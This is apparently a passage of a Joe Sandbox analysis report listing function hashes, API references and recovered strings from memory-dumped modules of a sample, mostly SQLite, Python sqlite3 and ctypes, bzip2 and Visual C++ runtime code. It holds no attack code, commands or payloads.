                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 44028BF6A08B8282EA55CB65D848BB977A2FF44B94F044235EA9D07795EF3CE446C304
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1712903325.00007FFB0C021000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFB0C020000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ffb0c020000_X9g8L63QGs.jbxd
Similarity
• API ID: 00007C263010
• String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
• API String ID: 3122504284-3727861699
• Opcode ID: eab345d482f7baabdec9e474e12e39428ea820bd0b391c33a24823f67c697a16
• Instruction ID: 19bf43ca4be0041bd1ad431693218387ed12107279a4c8f6804441716cffca49
• Opcode Fuzzy Hash: eab345d482f7baabdec9e474e12e39428ea820bd0b391c33a24823f67c697a16
• Instruction Fuzzy Hash: 74F17CF2609B8186E7909F65E048BAE77A4FB45B94F108036EF8E43795EF39D844C704
APIs
Strings
• unknown column "%s" in foreign key definition, xrefs: 00007FFB0C086A2E
• foreign key on %s should reference only one column of table %T, xrefs: 00007FFB0C086705
• number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 00007FFB0C08672E
Memory Dump Source
• Source File: 00000007.00000002.1712903325.00007FFB0C021000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFB0C020000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ffb0c020000_X9g8L63QGs.jbxd
Similarity
• API ID: 00007C263010
• String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
• API String ID: 3122504284-272990098
• Opcode ID: 92dd0ee7cd3e1cdafc56de997d58c6f6f428c161758f1bf7218e81256f987700
• Instruction ID: 9a696cf0ec2dca213edcf4f7a16e0a3a523182c2a220e7a05b504d1c668eabe3
• Opcode Fuzzy Hash: 92dd0ee7cd3e1cdafc56de997d58c6f6f428c161758f1bf7218e81256f987700
• Instruction Fuzzy Hash: 4BD1F3E2A0978182EB25CB21D048E796BA1FF55BD4F458131EE9D03785EF3DE549C708
APIs
Memory Dump Source
• Source File: 00000007.00000002.1715692326.00007FFB1C251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFB1C250000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ffb1c250000_X9g8L63QGs.jbxd
Similarity
• API ID: free$EntryInterlockedListNamePush__unmallocstrcpy_s
• String ID:
• API String ID: 3741236498-0
• Opcode ID: d800493cf60e4af3f4a7c920cc646ece182b7dab7bd32bb736cb4877c8bf044e
• Instruction ID: 1620fdf2235e6ab261075ba10d6991726bfd89fb09ec0fcc8c9a6b2bacbe576c
• Opcode Fuzzy Hash: d800493cf60e4af3f4a7c920cc646ece182b7dab7bd32bb736cb4877c8bf044e
• Instruction Fuzzy Hash: 9531A6A2B15F5152EE15EB39E8085EA27A2BF09BF4B658631DD1D43380EE3DD842C390
APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.1712903325.00007FFB0C021000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFB0C020000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ffb0c020000_X9g8L63QGs.jbxd
Similarity
• API ID: 00007C263010
• String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
• API String ID: 3122504284-3727861699
• Opcode ID: 5ce4de3094b3936009b68ce7b97789b60abce1f3b9da125a688e22a66712f262
• Instruction ID: 6f8b1e1a7e562edea2cd94494a6022cf9100a4b298cda5a28b7b50e4bbfbea93
• Opcode Fuzzy Hash: 5ce4de3094b3936009b68ce7b97789b60abce1f3b9da125a688e22a66712f262
• Instruction Fuzzy Hash: ACD19EF2A0868587DB60CF65E848BAAB3A5FF84B84F554036DE4D47794EF38D841C744
APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.1712903325.00007FFB0C021000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFB0C020000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb0c020000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: 00007C263010
                                                                                                                                                                                                                                                                    • String ID: "%w" $%Q%s
                                                                                                                                                                                                                                                                    • API String ID: 3122504284-1987291987
                                                                                                                                                                                                                                                                    • Opcode ID: 697807ff2bef80b0a8f6c162638d2e41be052984f89453d995ead0cb1d7b40fc
                                                                                                                                                                                                                                                                    • Instruction ID: a9afe59ef0ab6ebf0018adde6176277bf0f78a02c63e38b17fa4ba85dd2adb86
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 697807ff2bef80b0a8f6c162638d2e41be052984f89453d995ead0cb1d7b40fc
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7CC1D4E1A08A8185EA19CF25E448A7967A1FF45BE0F688335DE6E077E4EF3CE454C704
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1712903325.00007FFB0C021000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFB0C020000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712866038.00007FFB0C020000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C181000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C183000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C198000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713147144.00007FFB0C19A000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713182254.00007FFB0C19C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb0c020000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: 00007C263010
                                                                                                                                                                                                                                                                    • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
                                                                                                                                                                                                                                                                    • API String ID: 3122504284-3727861699
                                                                                                                                                                                                                                                                    • Opcode ID: 0235fca2d0f175db58fc5e3e3c02f5a62c82d5e712601103777287498438dc37
                                                                                                                                                                                                                                                                    • Instruction ID: 0c462e05e40bfcf697d84cf158d4ebac5a0fa8468a72e414274017eab86c3227
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0235fca2d0f175db58fc5e3e3c02f5a62c82d5e712601103777287498438dc37
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: ADA1E9F2A0C2D185D7648B29D498ABE7BA2FF80781F454235DB8A83745EF3CE495C714
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1714967826.00007FFB1B6F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00007FFB1B6F0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1714933150.00007FFB1B6F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1714967826.00007FFB1B708000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1714967826.00007FFB1B710000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715084541.00007FFB1B712000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715123647.00007FFB1B714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb1b6f0000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: 00007F805
                                                                                                                                                                                                                                                                    • String ID: Pointer indices must be integer$slice start is required for step < 0$slice step cannot be zero$slice stop is required
                                                                                                                                                                                                                                                                    • API String ID: 4011786353-3059441807
                                                                                                                                                                                                                                                                    • Opcode ID: ade25bbd3f50eefddba590a24cab0693854007375ec98fc59b974406f104237a
                                                                                                                                                                                                                                                                    • Instruction ID: 2fec624dbf6d1f15f8223d067b493e5640b4408a8d3e40b5d5239a91a7d93627
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ade25bbd3f50eefddba590a24cab0693854007375ec98fc59b974406f104237a
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 429139A1B09E0281EE159B36EDA4138A367AF65FF0B44E536E92D47BF4DF2CE4459300
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1712903325.00007FFB0C021000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFB0C020000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712866038.00007FFB0C020000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C181000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C183000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C198000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713147144.00007FFB0C19A000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713182254.00007FFB0C19C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb0c020000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: 00007C263010
                                                                                                                                                                                                                                                                    • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                                                                                                                                                                                                                                    • API String ID: 3122504284-2063813899
                                                                                                                                                                                                                                                                    • Opcode ID: 6f3502865f2554c3b22856db225aa2943b439a183bdfd32a53b0fa553fb1f819
                                                                                                                                                                                                                                                                    • Instruction ID: cf53adfb51073ff6af2351a0298f4ab880cf10ab832fbedbb7b6e0c93c98aecd
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6f3502865f2554c3b22856db225aa2943b439a183bdfd32a53b0fa553fb1f819
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1591CDE2A09B9182EB56CF29D418AB977A1FF88BC0F558235DE8D47785EF38E440C304
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1712903325.00007FFB0C021000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFB0C020000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712866038.00007FFB0C020000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C181000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C183000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C198000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713147144.00007FFB0C19A000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713182254.00007FFB0C19C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb0c020000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: 00007C263010
                                                                                                                                                                                                                                                                    • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
                                                                                                                                                                                                                                                                    • API String ID: 3122504284-3727861699
                                                                                                                                                                                                                                                                    • Opcode ID: cd9a2a69e9f7d6ade83202e689fa17b35f9cfb5684c60c5359bf09700d52bd0d
                                                                                                                                                                                                                                                                    • Instruction ID: 0f6437d9e5c5d9b9bbeaf34dd31ffce86bdd2fa834a4560557ed717986a441dd
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cd9a2a69e9f7d6ade83202e689fa17b35f9cfb5684c60c5359bf09700d52bd0d
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9091E1E2A086C186D7118B36D198ABE77E0FF40784F088636DB8E87695EF3CE955C744
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
Memory Dump Source
• Source File: 00000007.00000002.1712903325.00007FFB0C021000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFB0C020000, based on PE: true
• Associated: 00000007.00000002.1712866038.00007FFB0C020000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1712903325.00007FFB0C181000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1712903325.00007FFB0C183000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1712903325.00007FFB0C198000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1713147144.00007FFB0C19A000.00000080.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1713182254.00007FFB0C19C000.00000004.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ffb0c020000_X9g8L63QGs.jbxd
Similarity
• API ID: 00007C263010
• String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
• API String ID: 3122504284-3727861699
• Opcode ID: 3d911d27234210aac6b08763dd98c396f9c552569a20e5164efd14393bc372d3
• Instruction ID: 4420cf58725daae6a21a5e9791ce70a3dd4a569f79f3f07e8fed487c5966d514
• Opcode Fuzzy Hash: 3d911d27234210aac6b08763dd98c396f9c552569a20e5164efd14393bc372d3
• Instruction Fuzzy Hash: C281ADF2608A8287E7609F79D448BAE77A5FB44B84F448036EB8E47791EF38E445C704
APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.1715692326.00007FFB1C251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFB1C250000, based on PE: true
• Associated: 00000007.00000002.1715650944.00007FFB1C250000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1715735925.00007FFB1C264000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1715777428.00007FFB1C269000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1715818880.00007FFB1C26A000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ffb1c250000_X9g8L63QGs.jbxd
Similarity
• API ID: abort$CallEncodePointerTranslator
• String ID: MOC$RCC
• API String ID: 2889003569-2084237596
• Opcode ID: d60a8ffad84e6f064a5763a2c166d11077ba1814d2ca81799213d95430020a2c
• Instruction ID: 518d7aa90dad55af3c0331f36428d65abab3b82f4cb9e60636a7fe804e4bb9fe
• Opcode Fuzzy Hash: d60a8ffad84e6f064a5763a2c166d11077ba1814d2ca81799213d95430020a2c
• Instruction Fuzzy Hash: 9291C2F3A08B818BE710EB74E8482EE77A1FB067A8F204125EA8D17795DF38D595C740
Strings
• factory must return a cursor, not %.100s, xrefs: 00007FFB0C1A93FE
• Base Connection.__init__ not called., xrefs: 00007FFB0C1A94B9
• Cannot operate on a closed database., xrefs: 00007FFB0C1A94D3
• SQLite objects created in a thread can only be used in that same thread. The object was created in thread id %lu and this is thread id %lu., xrefs: 00007FFB0C1A94F3
Memory Dump Source
• Source File: 00000007.00000002.1713252916.00007FFB0C1A1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFB0C1A0000, based on PE: true
• Associated: 00000007.00000002.1713216867.00007FFB0C1A0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.1713252916.00007FFB0C1B9000.00000040.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.1713252916.00007FFB0C1BF000.00000040.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.1713365488.00007FFB0C1C1000.00000080.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.1713399942.00007FFB0C1C3000.00000004.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ffb0c1a0000_X9g8L63QGs.jbxd
Similarity
• API ID:
• String ID: Base Connection.__init__ not called.$Cannot operate on a closed database.$SQLite objects created in a thread can only be used in that same thread. The object was created in thread id %lu and this is thread id %lu.$factory must return a cursor, not %.100s
• API String ID: 0-2953218143
• Opcode ID: b86ca187cf45be0fdef249478a258149448544f65e464e611dbfdf5a566a5db7
• Instruction ID: 20e0fa9e636069c2d81178db60e5126a38fd1653be618fee0967d7161eef7518
• Opcode Fuzzy Hash: b86ca187cf45be0fdef249478a258149448544f65e464e611dbfdf5a566a5db7
• Instruction Fuzzy Hash: CE8107F6A09A4286EB549F75E45897933A0FF45F94F4880B5CA0E47B98DF7CE886C700
APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.1715692326.00007FFB1C251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFB1C250000, based on PE: true
• Associated: 00000007.00000002.1715650944.00007FFB1C250000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1715735925.00007FFB1C264000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1715777428.00007FFB1C269000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1715818880.00007FFB1C26A000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ffb1c250000_X9g8L63QGs.jbxd
Similarity
• API ID: Name::operator+
• String ID: std::nullptr_t$std::nullptr_t $volatile$volatile
• API String ID: 2943138195-757766384
• Opcode ID: 130e2d842e8b7dca47c2836e89f717505be4afbf408c40d13b3259f38f6b460e
• Instruction ID: cdc83aa161dde91b44e98ac9c4c6c651f227246e365eb0ae61160f79802bf6fc
• Opcode Fuzzy Hash: 130e2d842e8b7dca47c2836e89f717505be4afbf408c40d13b3259f38f6b460e
• Instruction Fuzzy Hash: 87716BE1A08F52D6EB14AF74D8490FA72A2BB067A0F644135CA4D03B98DF3DE960C790
APIs
• __except_validate_context_record.LIBVCRUNTIME ref: 00007FFB1C252DDA
  • Part of subcall function 00007FFB1C255508: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFB1C25108E), ref: 00007FFB1C255516
• abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFB1C252F2F
Strings
Memory Dump Source
• Source File: 00000007.00000002.1715692326.00007FFB1C251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFB1C250000, based on PE: true
• Associated: 00000007.00000002.1715650944.00007FFB1C250000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1715735925.00007FFB1C264000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1715777428.00007FFB1C269000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1715818880.00007FFB1C26A000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ffb1c250000_X9g8L63QGs.jbxd
Similarity
• API ID: abort$__except_validate_context_record
• String ID: $csm$csm
• API String ID: 3000080923-1512788406
• Opcode ID: 53f907965be1a88a6fd5fb15d1f71a23af454141565bf2445c328556a8274992
• Instruction ID: f743a7510b7205ea03eb2e2609f932df8e3796fd7b73dc5802b1f2fdf737507f
• Opcode Fuzzy Hash: 53f907965be1a88a6fd5fb15d1f71a23af454141565bf2445c328556a8274992
• Instruction Fuzzy Hash: BE71A2F2A08A8187D7619A35D4487FA7BA2EB06FA4F249135EA4C57785CF3CD891C780
APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.1715692326.00007FFB1C251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFB1C250000, based on PE: true
• Associated: 00000007.00000002.1715650944.00007FFB1C250000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1715735925.00007FFB1C264000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1715777428.00007FFB1C269000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1715818880.00007FFB1C26A000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ffb1c250000_X9g8L63QGs.jbxd
Similarity
• API ID: abort$CallEncodePointerTranslator
• String ID: MOC$RCC
                                                                                                                                                                                                                                                                    • API String ID: 2889003569-2084237596
                                                                                                                                                                                                                                                                    • Opcode ID: 9aa894c3c893ab74ee705d7221e0eb3435fed3f33ad5ca95d206f26215c5ec13
                                                                                                                                                                                                                                                                    • Instruction ID: 44ef81cfb9ffa9b5187ca4d2d209ad92e0c8de703c56b775e2896f9066273959
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9aa894c3c893ab74ee705d7221e0eb3435fed3f33ad5ca95d206f26215c5ec13
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 656191F2908B8582D724AB25E4443EAB7A1FB86BA4F144225EB9D03799DF7CD590CB40
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • __except_validate_context_record.LIBVCRUNTIME ref: 00007FFB1C252BB0
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FFB1C255508: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFB1C25108E), ref: 00007FFB1C255516
                                                                                                                                                                                                                                                                    • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFB1C252C7F
                                                                                                                                                                                                                                                                    • __FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00007FFB1C252C8F
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1715692326.00007FFB1C251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFB1C250000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715650944.00007FFB1C250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715735925.00007FFB1C264000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715777428.00007FFB1C269000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715818880.00007FFB1C26A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb1c250000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Frameabort$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                                                                    • String ID: csm$csm
                                                                                                                                                                                                                                                                    • API String ID: 1245442199-3733052814
                                                                                                                                                                                                                                                                    • Opcode ID: 20a4f0483044e05ead07b9216d24a097e489e06d9183abde2aaa2290edabb471
                                                                                                                                                                                                                                                                    • Instruction ID: c1e4e37648697789b584d647f574f4554d920eaad5ec11786b1df72e00a6bec8
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 20a4f0483044e05ead07b9216d24a097e489e06d9183abde2aaa2290edabb471
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6B6190F2908B4287EB60AB21D0482EA3692EB57BA5F244135EA5D877D5CF38E851C780
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1715692326.00007FFB1C251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFB1C250000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715650944.00007FFB1C250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715735925.00007FFB1C264000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715777428.00007FFB1C269000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715818880.00007FFB1C26A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb1c250000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: FileHeader
                                                                                                                                                                                                                                                                    • String ID: MOC$RCC$csm$csm
                                                                                                                                                                                                                                                                    • API String ID: 104395404-1441736206
                                                                                                                                                                                                                                                                    • Opcode ID: cc2941d08898c29ec0b938c5700553895786508ed6a70616e0c5efaebfc34f81
                                                                                                                                                                                                                                                                    • Instruction ID: 63669e47486f99ebeca972e8ecacd367ec1b922b8f8206188798e4d6efde5a67
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cc2941d08898c29ec0b938c5700553895786508ed6a70616e0c5efaebfc34f81
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8B518EE2A09A5287EA60BB31D0485FEA6A2FF467A4F240135DF8D43755CF7CEC528681
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1715481605.00007FFB1BB11000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00007FFB1BB10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715437200.00007FFB1BB10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715481605.00007FFB1BB25000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715572310.00007FFB1BB26000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715611009.00007FFB1BB28000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb1bb10000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: 00007
                                                                                                                                                                                                                                                                    • String ID: %d work, %d block, ratio %5.2f$ too repetitive; using fallback sorting algorithm$VUUU
                                                                                                                                                                                                                                                                    • API String ID: 3568877910-2988393112
                                                                                                                                                                                                                                                                    • Opcode ID: 4b1c468c53f6403045b0b18d06b17fdc23e8f335e10cb80c9efd56bfef58ea73
                                                                                                                                                                                                                                                                    • Instruction ID: 0d3759838c67c32f0832ceffe8950b9c8edf11ef76edd8ae57312839c73ac3e2
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4b1c468c53f6403045b0b18d06b17fdc23e8f335e10cb80c9efd56bfef58ea73
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3F41A6BAA18A41C7E7249F36E44527A73A6FB84B64F106235DE0E53BB5DF3CD441C600
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1715481605.00007FFB1BB11000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00007FFB1BB10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715437200.00007FFB1BB10000.00000002.00000001.01000000.0000000A.sdmpDownload File
